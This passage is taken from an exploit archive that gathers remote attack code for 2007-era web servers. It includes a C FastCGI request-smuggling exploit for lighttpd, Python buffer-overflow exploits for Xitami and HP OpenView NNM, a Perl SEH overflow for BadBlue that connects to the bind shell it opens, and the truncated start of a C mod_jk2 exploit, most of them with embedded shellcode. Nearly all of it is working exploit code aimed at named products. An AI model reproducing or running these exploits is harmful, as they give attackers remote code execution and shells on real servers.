{ 0x01, '0', 0x04, FILL_CHAR[0], NULL },
{ FILL_CHAR[0] - 0x5 - 0x2, 'B', FILL_CHAR[0] - 0x2, 'B', NULL },
{ 0x01, '1', 0x5450 - ( (FILL_CHAR[0] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'C', NULL },
{ 0x01, '2', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'D', NULL },
{ 0x01, '3', 0x04, FILL_CHAR[1], NULL },
{ FILL_CHAR[1] - 0x5 - 0x2, 'F', FILL_CHAR[1] - 0x2, 'F', NULL },
{ 0x01, '4', 0x5450 - ( (FILL_CHAR[1] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'H', NULL },
{ 0x01, '5', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'I', NULL },
{ 0x01, '6', 0x04, FILL_CHAR[2], NULL },
{ FILL_CHAR[2] - 0x5 - 0x2, 'K', FILL_CHAR[2] - 0x2, 'K', NULL },
{ 0x01, '7', 0x5450 - ( (FILL_CHAR[2] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'L', NULL },
{ 0x01, '8', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'M', NULL },
{ 0x01, '9', 0, 0, "uvzz" },
{ FILL_CHAR[3] - 0x5 - 0x2, 'O', FILL_CHAR[3] - 0x2, 'O', NULL },
{ 0x01, 'z', 0x1cf - ((FILL_CHAR[3]- 0x1 ) * 2) -0x1 - 0x5 - 0x1 - 0x4, 'z', NULL },
{ 0x00, 0x00, 0x00, 0x00, NULL }
};
/* fill rest of post content with data */
char content_part_one[] = {
0x06, 0x80, 0x00, 0x00, 0x00, 'H', 'T', 'T', 'P', '_', 'W'
};
/* set a fake FastCGI record to mark the end of data */
char content_part_two[] = {
0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
param = generate_param(¶m_size, names, values);
if (param && param_size > 0) {
fillup = 0x54af - 0x5f - 0x1e3 - param_size - 0x1 - 0x5 - 0x1 - 0x4;
length = REQUEST_SIZE_BASE + param_size +
strlen(server) + strlen(port) +
strlen(script);
request = (char*)malloc(length);
if (request) {
memset(request, 0, length);
offset = sprintf(request,
"POST %s HTTP/1.1\r\n"
"Host: %s:%s\r\n"
"Connection: close\r\n"
"Content-Length: %d\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n",
script,
server, port,
fillup + param_size + sizeof(content_part_one) +
sizeof(content_part_two) + 0x5f);
for (i = 0; header[i].name_length != 0; i++) {
name = generate_buffer(header[i].name_length,
header[i].name_char,
header[i].name_length != 1 ? random_mode : 0);
if (header[i].value_value) {
value = header[i].value_value;
} else {
value = generate_buffer(header[i].value_length,
header[i].value_char,
header[i].value_length != 4 &&
header[i].value_char != 'z' ? random_mode : 0);
}
offset += sprintf(request + offset,
"%s: %s\r\n", name, value);
if (!header[i].value_value) {
free(value);
}
free(name);
}
offset += sprintf(request + offset, "\r\n");
memcpy(request + offset, param, param_size);
offset += param_size;
content_part_one[0x03] = (fillup >> 8) & 0xff;
content_part_one[0x04] = fillup & 0xff;
for (i = 0; i < sizeof(content_part_one); i++) {
request[offset++] = content_part_one[i];
}
for (i = 0; i < fillup + 0x5f; i++) {
request[offset++] = random_mode ? RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))] : 'W';
}
for (i = 0; i < sizeof(content_part_two); i++) {
request[offset++] = content_part_two[i];
}
*length_out = offset;
}
}
return request;
}
/* usage
* display help screen
*/
void usage(int argc, char **argv) {
fprintf(stderr,
"usage: %s [-h] [-v] [-r] [-d <host>] [-s **********] [-p <port>]\n"
" [-n <header names>] [-a <header values>] [-o <output>]\n"
"\n"
"-h help\n"
"-v verbose\n"
"-r enable random mode\n"
"-d host HTTP server\n"
"-p port HTTP port (default: %s)\n"
"-s script script url on remote server (default: %s)\n"
"-n value header names (comma seperated, default: %s)\n"
"-a value header values (comma seperated, default: %s)\n"
"-o output save result in output file\n"
"\n"
,
argv[0],
DEFAULT_PORT,
DEFAULT_SCRIPT,
DEFAULT_NAME,
DEFAULT_VALUE);
exit(1);
}
/* connect_to
* connect to remote http server
*/
int connect_to(char *host, int port) {
struct sockaddr_in s_in;
struct hostent *he;
int s;
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
return -1;
}
memset(&s_in, 0, sizeof(s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
if ( (he = gethostbyname(host)) != NULL)
memcpy(&s_in.sin_addr, he->h_addr, he->h_length);
else {
if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) {
return -3;
}
}
if (connect(s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) {
return -4;
}
return s;
}
/* parse_response
* parse response data from http server
*/
void parse_response(char *response, int response_length, char *output) {
char *p;
int http_code;
int header_mode = 1;
int size;
int bytes = 0;
FILE *fp = stdout;
p = strtok(response, "\r\n");
while (p) {
/* header mode active? */
if (header_mode) {
if (strstr(p, "HTTP/1.1 ") == p) {
sscanf(p, "HTTP/1.1 %d", &http_code);
if (http_code == 200) {
printf(" request successful\n");
} else {
printf(" request failed (error code: %d)\n", http_code);
}
} else if (strstr(p, "Server: ") == p) {
printf(" server version: %s\n", strstr(p, "Server: ") + 8);
/* content length for first content */
} else if (!strchr(p, ':') && http_code == 200) {
sscanf(p, "%x", &size);
header_mode = 0;
if (output) {
fp = fopen(output, "w");
}
}
} else {
if (bytes < size) {
fprintf(fp, "%s\n", p);
bytes += strlen(p) + 1;
}
}
p = strtok(NULL, "\r\n");
}
if (fp != stdout && fp != NULL) {
printf(" %d bytes written to %s\n", bytes, output);
fclose(fp);
}
}
/* main entry
*/
int main(int argc, char **argv) {
char *server = NULL;
char *port = DEFAULT_PORT;
char *script = DEFAULT_SCRIPT;
char **name = NULL;
int name_length = 0;
char **value = NULL;
int value_length = 0;
char *request = NULL;
int request_length = 0;
int i;
int random_mode = 0;
int verbose = 0;
int s;
char c;
fd_set fs;
int bytes;
char buffer[BUFFER_SIZE];
char *response = NULL;
int response_length = 0;
char *output = NULL;
fprintf(stderr,
"hoagie_lighttpd.c - lighttpd(fastcgi) <= 1.4.17 remote\n"
"-andi / void.at\n\n");
if (argc < 2) {
usage(argc, argv);
} else {
while ((c = getopt (argc, argv, "hvrd:p:s:u:n:a:o:")) != EOF) {
switch (c) {
case 'h':
usage(argc, argv);
break;
case 'd':
server = optarg;
break;
case 'p':
port = optarg;
break;
case 's':
script = optarg;
break;
case 'n':
name = generate_array(optarg, DEFAULT_SEPARATOR, &name_length);
break;
case 'a':
value = generate_array(optarg, DEFAULT_SEPARATOR, &value_length);
break;
case 'r':
random_mode = 1;
srand(time(NULL));
break;
case 'v':
verbose = 1;
break;
case 'o':
output = optarg;
break;
default:
fprintf(stderr, " unknown command line option '%c'\n", c);
exit(-1);
}
}
if (!name) {
name = generate_array(DEFAULT_NAME, DEFAULT_SEPARATOR, &name_length);
}
if (!value) {
value = generate_array(DEFAULT_VALUE, DEFAULT_SEPARATOR, &value_length);
}
if (name_length != value_length) {
fprintf(stderr,
" check -n and -n parameter (argument list doesnt match)\n");
} else if (!server) {
fprintf(stderr, " server is missing\n");
} else {
if (random_mode) {
for (i = 0; i < 4; i++) {
FILL_CHAR[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))];
}
}
printf(" creating request (filler: %c/%c/%c/%c, random: %s)\n",
FILL_CHAR[0], FILL_CHAR[1], FILL_CHAR[2], FILL_CHAR[3],
random_mode ? "on": "off");
for (i = 0; name[i]; i++) {
printf(" set header [%s]=>[%s]\n", name[i], value[i]);
}
request = generate_request(server, port, script, name, value,
&request_length, random_mode);
if (verbose) {
printf(" sending [");
write(1, request, request_length);
printf("]\n");
}
if (request) {
printf(" connecting to %s:%s ...\n", server, port);
s = connect_to(server, atoi(port));
if (s > 0) {
FD_ZERO(&fs);
FD_SET(s, &fs);
printf(" request url %s\n", script);
write(s, request, request_length);
do {
select(s + 1, &fs, NULL, NULL, NULL);
bytes = read(s, buffer, sizeof(buffer));
if (bytes > 0) {
response_length += bytes;
response = realloc(response, response_length + 1);
if (response) {
memcpy(response + response_length - bytes,
buffer,
bytes);
}
}
} while (bytes > 0);
close(s);
response[response_length] = 0;
parse_response(response, response_length, output);
} else {
fprintf(stderr, " connect failed\n");
}
free(request);
} else {
fprintf(stderr, " can't allocate memory for request\n");
}
}
for (i = 0; name[i]; i++) {
free(name[i]);
}
free(name);
for (i = 0; value[i]; i++) {
free(value[i]);
}
free(value);
}
return 0;
}
// [2007-09-20]
80 Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <[email protected]>
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc) ******sploit.com>
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]\r\n
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]\r\n
# EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun ;)
##
from struct import pack
from time import sleep
from socket import *
host = "192.168.0.1"
port = 80
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x 13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x 7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x 1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x 3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x 1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\x aa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\x fa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x 7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x 7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\x f6\xb2")
opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish)
jmpcode = "\xeb\x22" # jmp short +0x22
buf = "A" * 72 # (76 - 4) xigui32.exe
buf += opcode
buf += jmpcode
buf += "\x90" * 128
buf += shellcode
header = (
'GET / HTTP/1.1\r\n'
'Host: %s\r\n'
'If-Modified-Since: Evil, %s\r\n'
'\r\n') % (host, buf)
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(header)
sleep(1)
s.close()
print "DONE"
# EoF
# [2007-09-24]
80 HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x 48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x 41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x 59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x 4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x 65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x 4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x 49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x 49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x 6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x 78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x 76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x 6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x 61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x 6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x 70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x 50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x 32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x 30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x 56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x 32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x 69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x 53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x 30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x 41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x 4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x 58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x 53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x 49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x 6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x 47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x 74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x 50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x 49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x 6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x 6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x 4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x 51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x 41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x 43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x 70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x 66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x 30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# [2007-12-12]
80 BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# http://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
#
# Credit to Luigi Auriemma
# Jacopo Cervini [email protected]
# 22/12/2007
#
#
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: badblue-272-seh.pl <victim> <port>\n\n";
exit;
}
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x38".
"\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x 4b\x48\x4e\x57".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48".
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x48".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x 46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x 45\x4e\x4b\x38".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54".
"\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x38".
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x 41\x53\x4b\x4d".
"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x 4e\x30\x4b\x38".
"\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x 50\x45\x4a\x46".
"\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x56".
"\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x 47\x47\x43\x57".
"\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x55".
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x 43\x55\x43\x34".
"\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x 4a\x56\x41\x51".
"\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x 4a\x46\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x 4c\x36\x42\x51".
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x42".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x 4f\x4f\x42\x4d".
"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x 4f\x4f\x48\x4d".
"\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x 43\x49\x4a\x56".
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x 4a\x46\x43\x46".
"\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x 49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x 41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x 44\x34\x4e\x42".
"\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x44\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x 41\x55\x4c\x56".
"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x 42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x46".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x 47\x55\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x 4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect to $ARGV[0] on port $ARGV[1]";
$pad0 = "\x41"x407;
$pad = "\x41"x3000;
$seh = "\xb6\x34\x03\x10"; # pop ebx pop ecx ret in ext.dll
$jmp = "\x90\x90\xeb\x08";
$longjmp = "\xe9\x6e\xf1\xff\xff";
$pad1 = "\x43"x8;
$pad2 = "\x43"x59;
$exploit = "GET /ext.dll?mfcisapicommand=PassThru&". $pad0 . $shellcode . $pad . $jmp . $seh . $pad1 .$longjmp . $pad2. "HTTP/1.0"."\r\n\r\n";
print $victim $exploit;
print " + Malicious GET request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + Connect on port 4444 of $host ...\n";
sleep(2);
system("telnet $host 4444");
exit;
# [2007-12-24]
80 mod_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : mod_jk2 v2.0.2 for Apache 2.0 Win32
* Found by : IOActive Security Advisory
* ----------------------------------------
* Exploit : mod_jk2 v2.0.2 Buffer Overflow Exploit (win32)
* Exploit date : 01.03.2008 - 02.03.2008
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : Exploit was found by IOActive Security Advisory, trivial exploit for win32.
* The only problem here is that the mod_jk2 forstly downcase all letter in Host
* header request, Metasploit v3 have solutions for this case:
* 1. Use non-upper encoder
* 2. Use non-alpha encoder
* i used the first variant here. and all is working good.
* ----------------------------------------
* Thanks to:
* 1. IOActive Security Advisory ( )
* 2. The Metasploit project ( http://metasploit.com )
* 3. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
************************************************** **********************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <ctime>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int get_version(char * remotehost, int port, int * itarget);
int validate_args(char * remotehost, int port, int sh, int itarget);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"mod_jk2/2.0.2 for Apache 2.0.48", 0x100115c3 },// pop,pop,ret
{NULL, 0x00000000 }
};
struct {
const char * name;
int length;
char * shellcode;
}shellcodes[]={
{"Bindshell, port 9999", 461,
/*
* windows/shell_bind_tcp - 461 bytes
* http://www.metasploit.com
* Encoder: x86/nonalpha
* EXITFUNC=seh, LPORT=9999
*/
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6c\x 8b\xd7\x3b"
"\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\x eb\xf1\xeb"
"\x71\xe8\xe2\xff\xff\xff\x11\x2e\x0f\x36\x03\x2c\x 32\x07\x27"
"\x06\x15\x30\x0f\x1a\x17\x38\x0b\x13\x2d\x2b\x15\x 28\x15\x13"
"\x13\x04\x08\x27\x13\x2b\x15\x26\x11\x13\x24\x28\x 28\x28\x28"
"\x28\x38\x28\x38\x28\x15\x13\x15\x28\x13\x0b\x24\x 11\x2a\x26"
"\x13\x24\x28\x26\x13\x32\x32\x24\x2b\x27\x27\x26\x 13\x02\x02"
"\x24\x26\x15\x11\x17\x15\x13\x18\x0e\x11\x2b\x22\x 11\x37\x39"
"\x39\x01\x13\x09\x06\x37\x24\x29\x2a\x2a\x2a\x11\x 2a\x2a\x26"
"\x2a\x13\x28\x11\x24\x17\x29\x13\x28\xfc\x7b\xeb\x 7b\xe8\xf9"
"\xff\xff\xff\x60\x8b\x7b\x24\x24\x8b\x7b\x3c\x8b\x 7c\x05\x7b"
"\x01\xef\x8b\x7b\x18\x8b\x5f\x20\x01\xeb\x7b\x8b\x 34\x8b\x01"
"\xee\x31\xc0\x99\xac\x84\xc0\x7b\x07\xc1\xca\x0d\x 01\xc2\xeb"
"\xf4\x3b\x7b\x24\x28\x7b\xe5\x8b\x5f\x24\x01\xeb\x 7b\x8b\x0c"
"\x7b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x7b\x24\x 1c\x7b\xc3"
"\x31\xdb\x7b\x8b\x7b\x30\x8b\x40\x0c\x8b\x7b\x1c\x ad\x8b\x40"
"\x08\x5e\x7b\x8e\x7b\x0e\xec\x7b\xff\xd6\x7b\x7b\x 7b\x7b\x33"
"\x32\x7b\x7b\x7b\x32\x5f\x7b\xff\xd0\x7b\xcb\xed\x fc\x3b\x7b"
"\xff\xd6\x5f\x89\xe5\x7b\x81\xed\x08\x02\x7b\x7b\x 02\xff\xd0"
"\x7b\xd9\x09\xf5\xad\x7b\xff\xd6\x7b\x7b\x7b\x7b\x 7b\x7b\x7b"
"\x7b\x7b\xff\xd0\x7b\x7b\x27\x0f\x7b\x7b\x89\xe1\x 95\x7b\xa4"
"\x1a\x7b\xc7\x7b\xff\xd6\x7b\x10\x7b\x7b\xff\xd0\x 7b\xa4\xad"
"\x2e\xe9\x7b\xff\xd6\x7b\x7b\xff\xd0\x7b\xe5\x7b\x 86\x7b\x7b"
"\xff\xd6\x7b\x7b\x7b\x7b\xff\xd0\x93\x7b\xe7\x7b\x c6\x7b\x7b"
"\xff\xd6\x7b\xff\xd0\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x 89\xe5\x7b"
"\x7b\x7b\x29\xcc\x89\xe7\x7b\x7b\x89\xe2\x31\xc0\x f3\xaa\xfe"
"\x7b\x2d\xfe\x7b\x2c\x93\x8d\x7b\x38\xab\xab\xab\x 7b\x7b\xfe"
"\xb3\x16\xff\x7b\x7b\xff\xd6\x5b\x7b\x7b\x7b\x7b\x 7b\x7b\x01"
